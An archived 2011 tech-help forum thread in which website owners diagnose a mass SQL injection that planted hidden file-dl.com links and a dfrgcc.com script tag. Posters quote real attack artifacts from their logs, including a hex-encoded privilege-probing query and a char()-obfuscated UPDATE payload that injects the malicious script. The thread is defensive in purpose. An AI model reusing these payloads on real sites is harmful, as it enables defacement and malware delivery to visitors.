Solved

What's causing "file-dl.com"-link hack?

Posted on 2011-09-13
17
1,066 Views
Last Modified: 2012-05-12
Look at this:
http://www.google.se/search?hl=&q=%22file-dl.com%22+crack&sourceid=navclient-ff&rlz=1B3GGHP_sv___SE434&ie=UTF-8&aq=4h&oq=

A lot of sites that have been hacked with the same hidden link to file-dl.com

What's causing this? How do they do it? How to prevent it?

0
Comment
Question by:Alfahane
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 6
  • 3
  • 2
  • +4
17 Comments
 

Expert Comment

by:4allSolutions
ID: 36530606
Same question here. I appreciate a quick answer !!
Having problem with one SQL 2008 server, this server is not public accesible . Only some limited range of server can access this. Not all the servers are our server...

Can you tell what your environment is ?
0
 

Author Comment

by:Alfahane
ID: 36530772
SQL 2000
0
 

Author Comment

by:Alfahane
ID: 36530831
Do you have problems with several databases on one server only?
0
Put Machine Learning to Work--Protect Your Clients

Machine learning means Smarter Cybersecurity™ Solutions.
As technology continues to advance, managing and analyzing massive data sets just can’t be accomplished by humans alone. It requires huge amounts of memory and storage, as well as high-speed processing of the cloud.

 

Expert Comment

by:4allSolutions
ID: 36531296
only one database on one server. The server has 50 databases.
The database is accessed from outside. But dont know for sure it is the external user that cause this injection or our servers.
I think (and hope) it is not one of our servers that is injecting. But i want to be sure .....
0
 

Expert Comment

by:jdcrane
ID: 36544222
Hi guys

it'll be a simple injection attack that's gotten past one of your web facing applications linking to the affected databases.. i've just cleaned up some systems with the exact same issue.

If you're reluctant to restore to avoid data loss, i can repair the data for you fairly quickly... just contact me and we can sort something out.

I can also pinpoint and plug the vulnerability in your application for you as well so this particular issue won't happen again.

All the best :)
0
 

Expert Comment

by:Randy_Pr
ID: 36546445
Been having the same issue for 2 days.  Not only seeing this in a sql2008 database but is adding it to files being written on our web server.   Need Help!
0
 

Expert Comment

by:jdcrane
ID: 36548523
in addition to repairing, i can set your system up to provide an immediate report via email.. some of the key things it shows are:
 
the attack vector (what part of your application the attacker was trying to attack),
the source ip,
the actual injection attempt,
the symbols used to help detect it, and
the corresponding url
here's one of many reports that a client of mine received from attacks originating out of China just last night, partially censored for obvious reasons:


Dirty Data
Injection Vector: ivDirectQueryString
Target Type: vbString
Number of hits: 4
Value: 25 AND (CAST(IS_SRVROLEMEMBER(0X730079007300610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X64006200630072006500610074006F007200)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X620075006C006B00610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X6400690073006B00610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X730065007200760065007200610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X7000750062006C0069006300) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006F0077006E0065007200) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006200610063006B00750070006F00700065007200610074006F007200) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006400610074006100770072006900740065007200) AS VARCHAR))=0 
Referring Page:
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
IP: 123.11.252.18(direct:123.11.252.18)
URL: /path/subpath/page.asp?id=25 and (cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x64006200630072006500610074006F007200)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x620075006C006B00610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x6400690073006B00610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x730065007200760065007200610064006D0069006E00)as varchar)+char(94)+cast(IS_MEMBER (0x7000750062006C0069006300) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006F0077006E0065007200) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006200610063006B00750070006F00700065007200610074006F007200) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006400610074006100770072006900740065007200) as varchar))=0 
Symbols: cast / varchar / = / (0x

Open in new window

0
 

Expert Comment

by:pysak
ID: 36567705
A websiteof mine has been affected by this issue. I stored the datbase and ensured that ONLY parameterised queries used throughout the website.

Today the website has been targetted again, this time with:
</title><script src=http://dfrgcc.com/ur.php></script>

There is no relevant information in the event log. Does anyone know what is causing this?
0
 

Expert Comment

by:jdcrane
ID: 36567890
G'day mate

Yes, you still have a vulnerability in your application. There is no "answer" for this, you'll need to review your application more closely in order to find the problem.

Cheers
0
 

Accepted Solution

by:
jdcrane earned 375 total points
ID: 36569910
</title><a style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=2 >crack</a>
</title><script src=http://dfrgcc.com/ur.php></script>

Open in new window

There are a few things you'd need to do in order to rid yourself of the above permanently. They are:

1

if you want to retain data created since the attack occurred, take any website that links to the database(s) concerned offline

2

review yours logs to determine where the attack vector was, eg url querystring etc, it's ok if you can't see anything

3

review your code in detail and resolve the vulnerabilities, the location of the injected content will assist with determining where the vulnerabilities are in your application

4

repair the data or restore a database backup, the latter only if you don't want to retain new data created since the attack occurred

5

put your site(s) back online
<advertising link removed by RockMod 20 Sept '11>
0
 

Expert Comment

by:pysak
ID: 36572859
For anyone that is experiencing this problem, here is an entry from the website log:

(815  ) 2011-09-20 12:00:39 192.168.x.x GET /affected-page.aspx id=631'+update+DatabaseTableName+set+NameOfClient=cast(ClientName+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(100)%2Bchar(102)%2Bchar(114)%2Bchar(103)%2Bchar(99)%2Bchar(99)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))-- 80 - 81.134.4.218 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20780624+Netscape/7.1+(ax) 200 0 0

This is very similar to the lisamoon hack a few months ago.

As you can see the querystring contains ASCII characters to disguise the query.

I have used a parametrised query on this page, restricting the input to int (integer).

The id querystring is also inspected to ensure it is an integer before the sqlcommand is run against the database, this does not prevent the hack.

Any ideas?
0
 

Assisted Solution

by:jdcrane
jdcrane earned 375 total points
ID: 36573405
deploy a test version of your site and debug the same request.. i think you'll find that if this was in fact the successful injection that corrupted your system that you can't be vetting the querystring properly, also depending on how you parameterised the query or sp, it may not protect you from injection.. if databasetablename and nameofclient are literals, they have to be retrieved from somewhere, otherwise it's a remarkably accurate guess (ie you were targeted).. might find there's another injection that pulls back or transmits the result to the attacking client for parsing and follow up injections like the above
0
 
LVL 38

Assisted Solution

by:lherrou
lherrou earned 125 total points
ID: 36573550
And don't forget, once you've completed your recovery in your database, check around for other backdoors that the hackers may have left. I've seen that more than once, where they leave a new directory or file with a file uploader tool, etc to give them access again.
0
 

Expert Comment

by:nhmedia
ID: 36597918
Would it improve matters if you restricted the number of characters in the qs parameter? IE your code would only run if the parameter was an integer AND fewer than ten chars?
I ask because we face the same issue.
KR
0
 

Assisted Solution

by:jdcrane
jdcrane earned 375 total points
ID: 36599510
if you're expecting an integer from a web parameter, you should be using the value returned from your conversion function (eg int,intval) not the parameter directly.

if you're expecting a non numeric string literal, it's best to be fishing for sql injection symbols and halting further action upon detection of suspicious activity. if you can't post source and sample querystrings,
your particular circumstances won't be exempt from the techniques referred to in the many in-depth guides out there for protecting yourself from injection,
0
 

Author Closing Comment

by:Alfahane
ID: 36948014
I'm asked by EE to close this question as it has been given the status "Abandoned".

I guess we can all agree that there is not one simple way to solve this problem, other than review our programming code more and hope that next clever hack will not come too soon.
0

Featured Post

Independent Software Vendors: We Want Your Opinion

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Did you know that more than 4 billion data records have been recorded as lost or stolen since 2013? It was a staggering number brought to our attention during last week’s ManageEngine webinar, where attendees received a comprehensive look at the ma…
The conference as a whole was very interesting, although if one has to make a choice between this one and some others, you may want to check out the others.  This conference is aimed mainly at government agencies.  So it addresses the various compli…
Nobody understands Phishing better than an anti-spam company. That’s why we are providing Phishing Awareness Training to our customers. According to a report by Verizon, only 3% of targeted users report malicious emails to management. With compan…
This video Micro Tutorial shows how to password-protect PDF files with free software. Many software products can do this, such as Adobe Acrobat (but not Adobe Reader), Nuance PaperPort, and Nuance Power PDF, but they are not free products. This vide…

728 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question